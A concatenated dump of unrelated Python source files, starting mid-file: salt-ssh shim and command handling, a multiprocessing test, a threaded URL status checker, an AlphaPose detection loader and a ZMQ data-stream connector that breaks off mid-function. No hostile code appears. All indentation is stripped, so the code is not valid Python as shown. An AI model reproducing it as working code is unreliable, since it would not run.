mine_args = mine_fun_data
elif isinstance(mine_fun_data, list):
for item in mine_fun_data[:]:
if isinstance(item, dict) and "mine_function" in item:
mine_fun = item["mine_function"]
mine_fun_data.pop(mine_fun_data.index(item))
mine_args = mine_fun_data
else:
mine_args = mine_fun_data
# If we found mine_args, replace our command's args
if isinstance(mine_args, dict):
self.args = []
self.kwargs = mine_args
elif isinstance(mine_args, list):
self.args = mine_args
self.kwargs = {}
try:
if self.mine:
result = wrapper[mine_fun](*self.args, **self.kwargs)
else:
result = self.wfuncs[self.fun](*self.args, **self.kwargs)
except TypeError as exc:
result = "TypeError encountered executing {}: {}".format(self.fun, exc)
log.error(result, exc_info_on_loglevel=logging.DEBUG)
retcode = 1
except Exception as exc: # pylint: disable=broad-except
result = "An Exception occurred while executing {}: {}".format(
self.fun, exc
)
log.error(result, exc_info_on_loglevel=logging.DEBUG)
retcode = 1
# Mimic the json data-structure that "salt-call --local" will
# emit (as seen in ssh_py_shim.py)
if isinstance(result, dict) and "local" in result:
ret = salt.utils.json.dumps({"local": result["local"]})
else:
ret = salt.utils.json.dumps({"local": {"return": result}})
return ret, retcode
def _cmd_str(self):
"""
Prepare the command string
"""
sudo = "sudo" if self.target["sudo"] else ""
sudo_user = self.target["sudo_user"]
if "_caller_cachedir" in self.opts:
cachedir = self.opts["_caller_cachedir"]
else:
cachedir = self.opts["cachedir"]
thin_code_digest, thin_sum = salt.utils.thin.thin_sum(cachedir, "sha1")
debug = ""
if not self.opts.get("log_level"):
self.opts["log_level"] = "info"
if (
salt.log.setup.LOG_LEVELS["debug"]
>= salt.log.setup.LOG_LEVELS[self.opts.get("log_level", "info")]
):
debug = "1"
arg_str = '''
OPTIONS.config = \
"""
{config}
"""
OPTIONS.delimiter = '{delimeter}'
OPTIONS.saltdir = '{saltdir}'
OPTIONS.checksum = '{checksum}'
OPTIONS.hashfunc = '{hashfunc}'
OPTIONS.version = '{version}'
OPTIONS.ext_mods = '{ext_mods}'
OPTIONS.wipe = {wipe}
OPTIONS.tty = {tty}
OPTIONS.cmd_umask = {cmd_umask}
OPTIONS.code_checksum = {code_checksum}
ARGS = {arguments}\n'''.format(
config=self.minion_config,
delimeter=RSTR,
saltdir=self.thin_dir,
checksum=thin_sum,
hashfunc="sha1",
version=salt.version.__version__,
ext_mods=self.mods.get("version", ""),
wipe=self.wipe,
tty=self.tty,
cmd_umask=self.cmd_umask,
code_checksum=thin_code_digest,
arguments=self.argv,
)
py_code = SSH_PY_SHIM.replace("#%%OPTS", arg_str)
py_code_enc = base64.encodebytes(py_code.encode("utf-8")).decode("utf-8")
if not self.winrm:
cmd = SSH_SH_SHIM.format(
DEBUG=debug,
SUDO=sudo,
SUDO_USER=sudo_user,
SSH_PY_CODE=py_code_enc,
HOST_PY_MAJOR=sys.version_info[0],
SET_PATH=self.set_path,
)
else:
cmd = saltwinshell.gen_shim(py_code_enc)
return cmd
def execute_script(self, script, extension="py", pre_dir=""):
"""
execute a script on the minion then delete
"""
if extension == "ps1":
ret = self.shell.exec_cmd('"powershell {}"'.format(script))
else:
if not self.winrm:
ret = self.shell.exec_cmd("/bin/sh '{}{}'".format(pre_dir, script))
else:
ret = saltwinshell.call_python(self, script)
# Remove file from target system
if not self.winrm:
self.shell.exec_cmd("rm '{}{}'".format(pre_dir, script))
else:
self.shell.exec_cmd("del {}".format(script))
return ret
def shim_cmd(self, cmd_str, extension="py"):
"""
Run a shim command.
If tty is enabled, we must scp the shim to the target system and
execute it there
"""
if not self.tty and not self.winrm:
return self.shell.exec_cmd(cmd_str)
# Write the shim to a temporary file in the default temp directory
with tempfile.NamedTemporaryFile(
mode="w+b", prefix="shim_", delete=False
) as shim_tmp_file:
shim_tmp_file.write(salt.utils.stringutils.to_bytes(cmd_str))
# Copy shim to target system, under $HOME/.<randomized name>
target_shim_file = ".{}.{}".format(
binascii.hexlify(os.urandom(6)).decode("ascii"), extension
)
if self.winrm:
target_shim_file = saltwinshell.get_target_shim_file(self, target_shim_file)
self.shell.send(shim_tmp_file.name, target_shim_file, makedirs=True)
# Remove our shim file
try:
os.remove(shim_tmp_file.name)
except OSError:
pass
ret = self.execute_script(script=target_shim_file, extension=extension)
return ret
def cmd_block(self, is_retry=False):
"""
Prepare the pre-check command to send to the subsystem
1. execute SHIM + command
2. check if SHIM returns a master request or if it completed
3. handle any master request
4. re-execute SHIM + command
5. split SHIM results from command results
6. return command results
"""
self.argv = _convert_args(self.argv)
log.debug(
"Performing shimmed, blocking command as follows:\n%s",
" ".join([str(arg) for arg in self.argv]),
)
cmd_str = self._cmd_str()
stdout, stderr, retcode = self.shim_cmd(cmd_str)
log.trace("STDOUT %s\n%s", self.target["host"], stdout)
log.trace("STDERR %s\n%s", self.target["host"], stderr)
log.debug("RETCODE %s: %s", self.target["host"], retcode)
error = self.categorize_shim_errors(stdout, stderr, retcode)
if error:
if error == "Python environment not found on Windows system":
saltwinshell.deploy_python(self)
stdout, stderr, retcode = self.shim_cmd(cmd_str)
while re.search(RSTR_RE, stdout):
stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
while re.search(RSTR_RE, stderr):
stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
elif error == "Undefined SHIM state":
self.deploy()
stdout, stderr, retcode = self.shim_cmd(cmd_str)
if not re.search(RSTR_RE, stdout) or not re.search(RSTR_RE, stderr):
# If RSTR is not seen in both stdout and stderr then there
# was a thin deployment problem.
return (
"ERROR: Failure deploying thin, undefined state: {}".format(
stdout
),
stderr,
retcode,
)
while re.search(RSTR_RE, stdout):
stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
while re.search(RSTR_RE, stderr):
stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
else:
return "ERROR: {}".format(error), stderr, retcode
# FIXME: this discards output from ssh_shim if the shim succeeds. It should
# always save the shim output regardless of shim success or failure.
while re.search(RSTR_RE, stdout):
stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
if re.search(RSTR_RE, stderr):
# Found RSTR in stderr which means SHIM completed and only
# and remaining output is only from salt.
while re.search(RSTR_RE, stderr):
stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
else:
# RSTR was found in stdout but not stderr - which means there
# is a SHIM command for the master.
shim_command = re.split(r"\r?\n", stdout, 1)[0].strip()
log.debug("SHIM retcode(%s) and command: %s", retcode, shim_command)
if (
"deploy" == shim_command
and retcode == salt.defaults.exitcodes.EX_THIN_DEPLOY
):
self.deploy()
stdout, stderr, retcode = self.shim_cmd(cmd_str)
if not re.search(RSTR_RE, stdout) or not re.search(RSTR_RE, stderr):
if not self.tty:
# If RSTR is not seen in both stdout and stderr then there
# was a thin deployment problem.
log.error(
"ERROR: Failure deploying thin, retrying:\n"
"STDOUT:\n%s\nSTDERR:\n%s\nRETCODE: %s",
stdout,
stderr,
retcode,
)
return self.cmd_block()
elif not re.search(RSTR_RE, stdout):
# If RSTR is not seen in stdout with tty, then there
# was a thin deployment problem.
log.error(
"ERROR: Failure deploying thin, retrying:\n"
"STDOUT:\n%s\nSTDERR:\n%s\nRETCODE: %s",
stdout,
stderr,
retcode,
)
while re.search(RSTR_RE, stdout):
stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
if self.tty:
stderr = ""
else:
while re.search(RSTR_RE, stderr):
stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
elif "ext_mods" == shim_command:
self.deploy_ext()
stdout, stderr, retcode = self.shim_cmd(cmd_str)
if not re.search(RSTR_RE, stdout) or not re.search(RSTR_RE, stderr):
# If RSTR is not seen in both stdout and stderr then there
# was a thin deployment problem.
return (
"ERROR: Failure deploying ext_mods: {}".format(stdout),
stderr,
retcode,
)
while re.search(RSTR_RE, stdout):
stdout = re.split(RSTR_RE, stdout, 1)[1].strip()
while re.search(RSTR_RE, stderr):
stderr = re.split(RSTR_RE, stderr, 1)[1].strip()
return stdout, stderr, retcode
def categorize_shim_errors(self, stdout_bytes, stderr_bytes, retcode):
stdout = salt.utils.stringutils.to_unicode(stdout_bytes)
stderr = salt.utils.stringutils.to_unicode(stderr_bytes)
if re.search(RSTR_RE, stdout) and stdout != RSTR + "\n":
# RSTR was found in stdout which means that the shim
# functioned without *errors* . . . but there may be shim
# commands, unless the only thing we found is RSTR
return None
if re.search(RSTR_RE, stderr):
# Undefined state
return "Undefined SHIM state"
if stderr.startswith("Permission denied"):
# SHIM was not even reached
return None
perm_error_fmt = (
"Permissions problem, target user may need to be root or use sudo:\n {0}"
)
errors = [
(
(),
"sudo: no tty present and no askpass program specified",
"sudo expected a password, NOPASSWD required",
),
(
(salt.defaults.exitcodes.EX_THIN_PYTHON_INVALID,),
"Python interpreter is too old",
"Python version error. Recommendation(s) follow:\n"
"- Install Python 3 on the target machine(s)\n"
"- You can use ssh_pre_flight or raw shell (-r) to install Python 3",
),
(
(salt.defaults.exitcodes.EX_THIN_CHECKSUM,),
"checksum mismatched",
"The salt thin transfer was corrupted",
),
(
(salt.defaults.exitcodes.EX_SCP_NOT_FOUND,),
"scp not found",
"No scp binary. openssh-clients package required",
),
(
(salt.defaults.exitcodes.EX_CANTCREAT,),
"salt path .* exists but is not a directory",
"A necessary path for salt thin unexpectedly exists:\n " + stderr,
),
(
(),
"sudo: sorry, you must have a tty to run sudo",
"sudo is configured with requiretty",
),
((), "Failed to open log file", perm_error_fmt.format(stderr)),
((), "Permission denied:.*/salt", perm_error_fmt.format(stderr)),
(
(),
"Failed to create directory path.*/salt",
perm_error_fmt.format(stderr),
),
(
(salt.defaults.exitcodes.EX_SOFTWARE,),
"exists but is not",
"An internal error occurred with the shim, please investigate:\n "
+ stderr,
),
(
(),
"The system cannot find the path specified",
"Python environment not found on Windows system",
),
(
(),
"is not recognized",
"Python environment not found on Windows system",
),
]
for error in errors:
if retcode in error[0] or re.search(error[1], stderr):
return error[2]
return None
def check_refresh(self, data, ret):
"""
Stub out check_refresh
"""
return
def module_refresh(self):
"""
Module refresh is not needed, stub it out
"""
return
def lowstate_file_refs(chunks):
"""
Create a list of file ref objects to reconcile
"""
refs = {}
for chunk in chunks:
saltenv = "base"
crefs = []
for state in chunk:
if state == "__env__":
saltenv = chunk[state]
elif state == "saltenv":
saltenv = chunk[state]
elif state.startswith("__"):
continue
crefs.extend(salt_refs(chunk[state]))
if crefs:
if saltenv not in refs:
refs[saltenv] = []
refs[saltenv].append(crefs)
return refs
def salt_refs(data):
"""
Pull salt file references out of the states
"""
proto = "salt://"
ret = []
if isinstance(data, str):
if data.startswith(proto):
return [data]
if isinstance(data, list):
for comp in data:
if isinstance(comp, str):
if comp.startswith(proto):
ret.append(comp)
return ret
def mod_data(fsclient):
"""
Generate the module arguments for the shim data
"""
# TODO, change out for a fileserver backend
sync_refs = [
"modules",
"states",
"grains",
"renderers",
"returners",
]
ret = {}
envs = fsclient.envs()
ver_base = ""
for env in envs:
files = fsclient.file_list(env)
for ref in sync_refs:
mods_data = {}
pref = "_{}".format(ref)
for fn_ in sorted(files):
if fn_.startswith(pref):
if fn_.endswith((".py", ".so", ".pyx")):
full = salt.utils.url.create(fn_)
mod_path = fsclient.cache_file(full, env)
if not os.path.isfile(mod_path):
continue
mods_data[os.path.basename(fn_)] = mod_path
chunk = salt.utils.hashutils.get_hash(mod_path)
ver_base += chunk
if mods_data:
if ref in ret:
ret[ref].update(mods_data)
else:
ret[ref] = mods_data
if not ret:
return {}
ver_base = salt.utils.stringutils.to_bytes(ver_base)
ver = hashlib.sha1(ver_base).hexdigest()
ext_tar_path = os.path.join(
fsclient.opts["cachedir"], "ext_mods.{}.tgz".format(ver)
)
mods = {"version": ver, "file": ext_tar_path}
if os.path.isfile(ext_tar_path):
return mods
tfp = tarfile.open(ext_tar_path, "w:gz")
verfile = os.path.join(fsclient.opts["cachedir"], "ext_mods.ver")
with salt.utils.files.fopen(verfile, "w+") as fp_:
fp_.write(ver)
tfp.add(verfile, "ext_version")
for ref in ret:
for fn_ in ret[ref]:
tfp.add(ret[ref][fn_], os.path.join(ref, fn_))
tfp.close()
return mods
def ssh_version():
"""
Returns the version of the installed ssh command
"""
# This function needs more granular checks and to be validated against
# older versions of ssh
ret = subprocess.Popen(
["ssh", "-V"], stdout=subprocess.PIPE, stderr=subprocess.PIPE
).communicate()
try:
version_parts = ret[1].split(b",")[0].split(b"_")[1]
parts = []
for part in version_parts:
try:
parts.append(int(part))
except ValueError:
return tuple(parts)
return tuple(parts)
except IndexError:
return (2, 0)
def _convert_args(args):
"""
Take a list of args, and convert any dicts inside the list to keyword
args in the form of `key=value`, ready to be passed to salt-ssh
"""
converted = []
for arg in args:
if isinstance(arg, dict):
for key in list(arg.keys()):
if key == "__kwarg__":
continue
converted.append("{}={}".format(key, arg[key]))
else:
converted.append(arg)
return converted
|
test_mp.py
|
from multiprocessing import Process, cpu_count
from multiprocessing import JoinableQueue as Queue
from ZermeloSim.ZermeloSim import worker
if __name__ == '__main__':
n = 100
p = cpu_count()-1
jobs = Queue()
results = Queue()
pool = [Process(target=worker, args=(jobs, results)).start() for _ in range(p)]
idx = range(n)
weights = [-1]*n
for job in zip(idx, weights):
jobs.put(job)
jobs.join()
r = [results.get() for _ in range(n)]
for _ in range(p):
jobs.put(None)
jobs.join()
print(r)
|
que.py
|
#!/usr/bin/python3
# Name: que.py
# Version: R3.1
# Author: jvalentinpastrana at gmail
# Date: January 2020
# Function: Includes threading with queue
#
import requests
from threading import Thread
import queue
DIRNAME = "output/"
TIMEOUT = 5
concurrent = 4
# Threading functions
def doWork():
while True:
url = q.get()
status, url = getStatus(url)
writeResult(status, url)
q.task_done()
def getStatus(ourl):
try:
req = requests.head(ourl, timeout=TIMEOUT, proxies={'http':'','https':''})
status = str(req.status_code)
return status, ourl
except:
return "XXX", ourl
def writeResult(status, ourl):
urlFilter.write(status + ' ' + ourl + '\n')
print(status + ' ' + ourl )
# Start the paralel queue
q = queue.Queue(concurrent)
for i in range(concurrent):
t = Thread(target=doWork)
t.daemon = True
t.start()
|
file_detector.py
|
from itertools import count
from threading import Thread
from queue import Queue
import json
import cv2
import numpy as np
import torch
import torch.multiprocessing as mp
from alphapose.utils.presets import SimpleTransform
class FileDetectionLoader():
def __init__(self, input_source, cfg, opt, queueSize=128):
self.cfg = cfg
self.opt = opt
self.bbox_file = input_source
self._input_size = cfg.DATA_PRESET.IMAGE_SIZE
self._output_size = cfg.DATA_PRESET.HEATMAP_SIZE
self._sigma = cfg.DATA_PRESET.SIGMA
if cfg.DATA_PRESET.TYPE == 'simple':
self.transformation = SimpleTransform(
self, scale_factor=0,
input_size=self._input_size,
output_size=self._output_size,
rot=0, sigma=self._sigma,
train=False, add_dpg=False)
# initialize the det file list
boxes = None
if isinstance(self.bbox_file,list):
boxes = self.bbox_file
else:
with open(self.bbox_file, 'r') as f:
boxes = json.load(f)
assert boxes is not None, 'Load %s fail!' % self.bbox_file
self.all_imgs = []
self.all_boxes = {}
self.all_scores = {}
self.all_ids = {}
num_boxes = 0
for k_img in range(0, len(boxes)):
det_res = boxes[k_img]
img_name = det_res['image_id']
if img_name not in self.all_imgs:
self.all_imgs.append(img_name)
self.all_boxes[img_name] = []
self.all_scores[img_name] = []
self.all_ids[img_name] = []
x1, y1, w, h = det_res['bbox']
bbox = [x1, y1, x1 + w, y1 + h]
score = det_res['score']
self.all_boxes[img_name].append(bbox)
self.all_scores[img_name].append(score)
if 'idx' in det_res.keys():
self.all_ids[img_name].append(int(det_res['idx']))
else:
self.all_ids[img_name].append(0)
# initialize the queue used to store data
"""
pose_queue: the buffer storing post-processed cropped human image for pose estimation
"""
if opt.sp:
self._stopped = False
self.pose_queue = Queue(maxsize=queueSize)
else:
self._stopped = mp.Value('b', False)
self.pose_queue = mp.Queue(maxsize=queueSize)
def start_worker(self, target):
if self.opt.sp:
p = Thread(target=target, args=())
else:
p = mp.Process(target=target, args=())
# p.daemon = True
p.start()
return p
def start(self):
# start a thread to pre process images for object detection
image_preprocess_worker = self.start_worker(self.get_detection)
return [image_preprocess_worker]
def stop(self):
# clear queues
self.clear_queues()
def terminate(self):
if self.opt.sp:
self._stopped = True
else:
self._stopped.value = True
self.stop()
def clear_queues(self):
self.clear(self.pose_queue)
def clear(self, queue):
while not queue.empty():
queue.get()
def wait_and_put(self, queue, item):
if not self.stopped:
queue.put(item)
def wait_and_get(self, queue):
if not self.stopped:
return queue.get()
def get_detection(self):
for im_name_k in self.all_imgs:
boxes = torch.from_numpy(np.array(self.all_boxes[im_name_k]))
scores = torch.from_numpy(np.array(self.all_scores[im_name_k]))
ids = torch.from_numpy(np.array(self.all_ids[im_name_k]))
orig_img_k = cv2.cvtColor(cv2.imread(im_name_k), cv2.COLOR_BGR2RGB) #scipy.misc.imread(im_name_k, mode='RGB') is depreciated
inps = torch.zeros(boxes.size(0), 3, *self._input_size)
cropped_boxes = torch.zeros(boxes.size(0), 4)
for i, box in enumerate(boxes):
inps[i], cropped_box = self.transformation.test_transform(orig_img_k, box)
cropped_boxes[i] = torch.FloatTensor(cropped_box)
self.wait_and_put(self.pose_queue, (inps, orig_img_k, im_name_k, boxes, scores, ids, cropped_boxes))
self.wait_and_put(self.pose_queue, (None, None, None, None, None, None, None))
return
def read(self):
return self.wait_and_get(self.pose_queue)
@property
def stopped(self):
if self.opt.sp:
return self._stopped
else:
return self._stopped.value
@property
def length(self):
return len(self.all_imgs)
@property
def joint_pairs(self):
"""Joint pairs which defines the pairs of joint to be swapped
when the image is flipped horizontally."""
return [[1, 2], [3, 4], [5, 6], [7, 8],
[9, 10], [11, 12], [13, 14], [15, 16]]
|
connector.py
|
from __future__ import absolute_import, division, print_function
"""
Author : Lyubimov, A.Y.
Created : 03/31/2020
Last Changed: 05/15/2020
Description : Streaming stills processor for live data analysis
"""
import os
import time
import zmq
from threading import Thread
from interceptor import packagefinder, read_config_file
from interceptor.connector.processor import FastProcessor
from interceptor.connector import utils
def debug_segfault():
""" Deliberate segfault for debugging purposes """
import ctypes
ctypes.string_at(1)
class ZMQProcessBase:
""" Base class for Connector, Reader, and Collector classes """
def __init__(self, comm, args, name="zmq_thread", localhost="localhost"):
""" Constructor
:param comm: mpi4py communication instance
:param args: command line arguments
:param name: thread name (for logging mostly)
:param localhost: the host of the Collector process (ranked 0)
"""
self.name = name
self.comm = comm
self.localhost = localhost
if comm:
self.rank = comm.Get_rank() # each process in MPI has a unique id
self.size = comm.Get_size() # number of processes running in this job
else:
self.rank = args.rank
self.size = args.n_proc
self.stop = False
self.timeout_start = None
self.args = args
self.generate_config()
def generate_config(self):
# generate startup config params
if self.args.config_file:
s_config = read_config_file(self.args.config_file)
else:
s_config = packagefinder('startup.cfg', 'connector', read_config=True)
# convert to namedtuple because 1) not easily mutable, 2) can call attributes
self.cfg = s_config[self.args.beamline]
@staticmethod
def make_socket(
socket_type,
wid,
host=None,
port=None,
url=None,
bind=False,
verbose=False,
):
assert (host and port) or url
# assemble URL from host and port
if not url:
url = "tcp://{}:{}".format(host, port)
# Create socket
context = zmq.Context()
socket = context.socket(getattr(zmq, socket_type.upper()))
socket.identity = wid.encode('ascii')
# Connect to URL
socket.connect(url)
if verbose:
print('{} connected to {}'.format(wid, url))
# Bind to port
if bind:
if not port:
bind_port = url[-4:]
else:
bind_port = port
bind_url = "tcp://*:{}".format(bind_port)
socket.bind(bind_url)
if verbose:
print('{} bound to {}'.format(wid, bind_url))
return socket
def broadcast(self, data):
if self.comm:
self.comm.bcast(data, root=0)
class Connector(ZMQProcessBase):
""" A ZMQ Broker class, with a zmq.PULL backend (facing a zmq.PUSH Splitter) and
a zmq.ROUTER front end (facing zmq.REQ Readers). Is intended to a) get images
from Splitter and assign each image to the least-recently used (LRU) Reader,
b) handle start-up / shut-down signals, as well as type-of-processing signals
from Splitter, c) manage MPI processes, d) serve as a failpoint away from
Splitter, which is writing data to files """
def __init__(self, name="CONN", comm=None, args=None, localhost="localhost"):
super(Connector, self).__init__(
name=name, comm=comm, args=args, localhost=localhost
)
self.initialize_ends()
self.readers = []
def initialize_ends(self):
""" initializes front- and backend sockets """
wport = "6{}".format(str(self.cfg.getstr('port'))[1:])
self.read_end = self.make_socket(
socket_type="router",
wid="{}_READ".format(self.name),
host=self.localhost,
port=wport,
bind=True,
)
self.data_end = self.make_socket(
socket_type="pull",
wid="{}_DATA".format(self.name),
host=self.cfg.getstr('host'),
port=self.cfg.getstr('port'),
)
self.poller = zmq.Poller()
def connect_readers(self):
# register backend and frontend with poller
self.poller.register(self.read_end, zmq.POLLIN)
self.poller.register(self.data_end, zmq.POLLIN)
while True:
sockets = dict(self.poller.poll())
if self.read_end in sockets:
# handle worker activity
request = self.read_end.recv_multipart()
if not request[0] in self.readers:
self.readers.append(request[0])
if self.data_end in sockets:
# Receive frames and assign to readers
frames = self.data_end.recv_multipart()
if self.readers:
reader = self.readers.pop()
rframes = [reader, b"", b"BROKER", b""]
rframes.extend(frames)
self.read_end.send_multipart(rframes)
else:
frmdict = utils.decode_frame_header(frames[2])
print(
"WARNING! NO READY READERS! Skipping frame #", frmdict["frame"]
)
def run(self):
self.connect_readers()
class Reader(ZMQProcessBase):
""" ZMQ Reader: requests a single frame (multipart) from the Eiger,
converts to dictionary format, attaches to a special format class,
carries out processing, and sends the result via ZMQ connection to the
Collector class.
"""
def __init__(self, name="zmq_reader", comm=None, args=None, localhost="localhost"):
super(Reader, self).__init__(
name=name, comm=comm, args=args, localhost=localhost
)
self.generate_processor()
def generate_processor(self, run_mode='DEFAULT'):
self.processor = FastProcessor(
run_mode=run_mode,
configfile=self.cfg.getstr('processing_config_file'),
test=self.args.test,
)
if self.rank == 2:
self.processor.print_params()
def convert_from_stream(self, frames):
img_info = {
"state": "import",
"proc_name": self.name,
"proc_url": "tcp://{}:{}".format(self.cfg.getstr('host'), self.cfg.getstr(
'port')),
"series": -1,
"frame": -1,
"run_mode": None,
"mapping": "",
'exposure_time': 0.1,
}
return_frames = None
if len(frames) <= 2: # catch stand-alone header frame or end-of-series frame
fdict = utils.decode_header(frames[0])
try:
assert "htype" in fdict
except AssertionError:
img_info["state"] = "error"
img_info["dat_error"] = 'DATA ERROR: Invalid entry: no "hdict" key!'
else:
if "dseries_end" in fdict["htype"]:
img_info["state"] = "series-end"
elif self.cfg.getstr('header_type') in fdict["htype"]:
try:
self.make_header(frames)
except Exception as e:
img_info["state"] = "error"
img_info["dat_error"] = "HEADER ERROR: {}".format(str(e))
else:
img_info["series"] = -999
img_info["frame"] = -999
img_info["state"] = "header-frame"
else:
hdr_frames = frames[:2]
img_frames = frames[2:]
self.make_header(frames=hdr_frames)
try:
# Get custom keys (if any) from header
hdict = utils.decode_header(header=self.header[0])
custom_keys_string = self.cfg.getstr('custom_keys')
if custom_keys_string is not None:
custom_keys = [k.strip() for k in custom_keys_string.split(',')]
for ckey in custom_keys:
if ckey == self.cfg.getstr('filepath_key'):
img_info['filename'] = os.path.basename(hdict[ckey])
img_info['full_path'] = hdict[ckey]
else:
if self.cfg.getstr('run_mode_key') in ckey:
p_idx = self.cfg.getint('run_mode_key_index')
img_info["run_mode"] = hdict[ckey].split('.')[p_idx]
img_info[ckey] = hdict[ckey]
# Get exposure time (frame time) from header
hdict_1 = utils.decode_frame(frame=self.header[1])
img_info['exposure_time'] = float(hdict_1['frame_time'])
# Get frame info from frame
fdict = utils.decode_frame_header(img_frames[0][:-1])
img_info.update(
{"series": fdict["series"], "frame": fdict["frame"], }
)
img_info["state"] = "process"
return_frames = img_frames
except Exception as e:
img_info["state"] = "error"
img_info["dat_error"] = "CONVERSION ERROR: {}".format(str(e))
return img_info, return_frames
def make_header(self, frames):
if isinstance(frames[0], bytes):
self.header = [frames[0][:-1], frames[1][:-1]]
else:
self.header = [frames[0].bytes[:-1], frames[1].bytes[:-1]]
def make_data_dict(self, frames):
info, frames = self.convert_from_stream(frames)
if info["state"] in ["error", "header-frame", "series-end"]:
data = None
else:
data = {"header1": self.header[0], "header2": self.header[1]}
for frm in frames:
i = frames.index(frm) + 1
key = "streamfile_{}".format(i)
if i != 3:
data[key] = frm[:-1] if isinstance(frm, bytes) else frm.bytes[:-1]
else:
data[key] = frm if isinstance(frm, bytes) else frm.bytes
proc_info = {
"beamXY": (0, 0),
"dist": 0,
"n_spots": 0,
"n_overloads": 0,
"hres": 99.0,
"score": 0,
"n_ice_rings": 0,
"mean_shape_ratio": 0,
"n_indexed": 0,
"sg": "NA",
"uc": "NA",
"comment": "",
"t0": 0,
"phil": "",
}
info.update(proc_info)
return data, info
def process(self, info, frame, filename):
s_proc = time.time()
# regenerate processor if necessary
if info['run_mode'] != self.processor.run_mode:
self.generate_processor(run_mode=info['run_mode'])
# process image
info = self.processor.run(data=frame, filename=filename, info=info)
info["proc_time"] = time.time() - s_proc
return info
def write_eiger_file(self):
eiger_idx = self.rank
filename = "eiger_{}.stream".format(eiger_idx)
self.name = "ZMQ_{:03d}".format(eiger_idx)
with open(filename, "w") as fh:
fh.write("EIGERSTREAM")
return filename
def initialize_zmq_sockets(self, init_r_socket=True):
try:
# If the Connector is active, connect the Reader socket to the Connector;
# if not, connect the Reader socket to the Splitter
if self.args.broker:
dhost = self.localhost
dport = "6{}".format(str(self.cfg.getstr('port'))[1:])
else:
dhost = self.cfg.getstr('host')
dport = self.cfg.getstr('port')
self.d_socket = self.make_socket(
socket_type="req",
wid=self.name,
host=dhost,
port=dport,
verbose=self.args.verbose,
)
proc_url = "tcp://{}:{}".format(dhost, dport)
if init_r_socket:
# if collector_host option exists, use it
if self.args.collector_host:
chost = self.args.collector_host
else:
chost = self.localhost
cport = "7{}".format(str(self.cfg.getstr('port'))[1:])
self.r_socket = self.make_socket(
socket_type="push",
wid="{}_2C".format(self.name),
host=chost,
port=cport,
verbose=self.args.verbose,
)
except Exception as e:
print("SOCKET ERROR: {}".format(e))
exit()
else:
info = {
"proc_name": self.name,
"proc_url": proc_url,
"state": "connected",
}
self.r_socket.send_json(info)
def read_stream(self):
# Write eiger_*.stream file
filename = self.write_eiger_file()
# Initialize ZMQ sockets
self.initialize_zmq_sockets()
# Start listening for ZMQ stream
while True:
time_info = {
"receive_time": 0,
"wait_time": 0,
"total_time": 0,
}
try:
start = time.time()
self.d_socket.send(self.name.encode('utf-8'))
expecting_reply = True
while expecting_reply:
timeout = self.cfg.getstr('timeout') * 1000 if self.cfg.getstr(
'timeout') else None
if self.d_socket.poll(timeout=timeout):
fstart = time.time()
frames = self.d_socket.recv_multipart()
time_info["receive_time"] = time.time() - fstart
time_info["wait_time"] = time.time() - start - time_info[
"receive_time"]
if self.args.broker: # if it came from broker, remove first two frames
frames = frames[2:]
expecting_reply = False
else:
# close and re-initialize d_socket
self.d_socket.close()
self.initialize_zmq_sockets(init_r_socket=False)
self.d_socket.send(b"Hello")
except Exception as exp:
print("DEBUG: {} CONNECT FAILED! {}".format(self.name, exp))
continue
else:
# Drain images without processing
if self.args.drain:
if self.args.verbose:
print(
str(frames[0].bytes[:-1])[3:-2],
"({})".format(self.name),
"rcv time: {:.4f} sec".format(time_info["receive_time"]),
)
else:
# make data and info dictionaries
data, info = self.make_data_dict(frames)
# handle different info scenarios
# some unknown error
if info is None:
print("debug: info is None!")
continue
# normal processing info
elif info["state"] == "process":
info = self.process(info, frame=data, filename=filename)
time_info["total_time"] = time.time() - start
info.update(time_info)
# end-of-series signal (sleep for four seconds... maybe obsolete)
elif info["state"] == "series-end":
time.sleep(4)
continue
# send info to collector
self.r_socket.send_json(info)
self.d_socket.close()
def run(self):
self.read_stream()
def abort(self):
self.stop = True
class Collector(ZMQProcessBase):
""" Runs as 0-ranked process in MPI; collects all processing results from
individual Reader processes and prints them to stdout and sends them
off as a single stream to the UI if requested.
"""
def __init__(self, name="COLLECTOR", comm=None, args=None, localhost=None):
super(Collector, self).__init__(
name=name, comm=comm, args=args, localhost=localhost
)
self.readers = {}
self.advance_stdout = False
def monitor_splitter_messages(self):
# listen for messages from the splitter monitor port
# todo: it occurs to me that this can be used for a variety of purposes!
mport = "5{}".format(str(self.cfg.getstr('port'))[1:])
self.m_socket = self.make_socket(
socket_type="sub",
wid=self.name + "_M",
host=self.cfg.getstr('host'),
port=mport,
bind=True,
verbose=True,
)
self.m_socket.setsockopt(zmq.SUBSCRIBE, b'')
while True:
msg = self.m_socket.recv()
if msg:
print('\n*** RUN FINISHED! ***\n')
print(time.strftime('%b %d %Y %I:%M:%S %p'))
msg_dict = utils.decode_frame(msg, tags='requests')
checked_in = msg_dict['requests']
hung_readers = []
down_readers = []
for rdr in self.readers.keys():
if not rdr in checked_in.keys():
down_readers.append(rdr)
elif not "series_end" in checked_in[rdr]:
hung_readers.append(rdr)
if hung_readers:
print('{} Readers down during this run:'.format(len(hung_readers)))
for rdr in hung_readers:
lt = time.localtime(self.readers[rdr]['last_reported'])
silent_since = time.strftime('%b %d %Y %I:%M:%S %p', lt)
print(' {} silent since {}'.format(rdr, silent_since))
if down_readers:
print('{} Readers are permanently down:'.format(len(down_readers)))
for rdr in down_readers:
lt = time.localtime(self.readers[rdr]['last_reported'])
silent_since = time.strftime('%b %d %Y %I:%M:%S %p', lt)
print(' {} down since {}'.format(rdr, silent_since))
idle_readers = len(self.readers) - len(hung_readers) - len(down_readers)
print('{} of {} Readers are CONNECTED and IDLE'.format(
idle_readers,
len(self.readers), ),
flush=True)
self.send_check_in_info(hung_readers, down_readers)
self.advance_stdout = True
def send_check_in_info(self, hung_readers, down_readers):
down_readers.extend(hung_readers)
down_dict = {"down_readers": down_readers}
self.broadcast(data=down_dict)
def understand_info(self, info):
reader_name = info['proc_name']
if info["state"] == "connected":
# add reader index to dictionary of active readers with state "ON"
self.readers[reader_name] = {
'name': reader_name,
'status': 'IDLE',
'start_time': time.time(),
}
msg = "{} CONNECTED to {}".format(reader_name, info["proc_url"])
if len(self.readers) == self.size - 1:
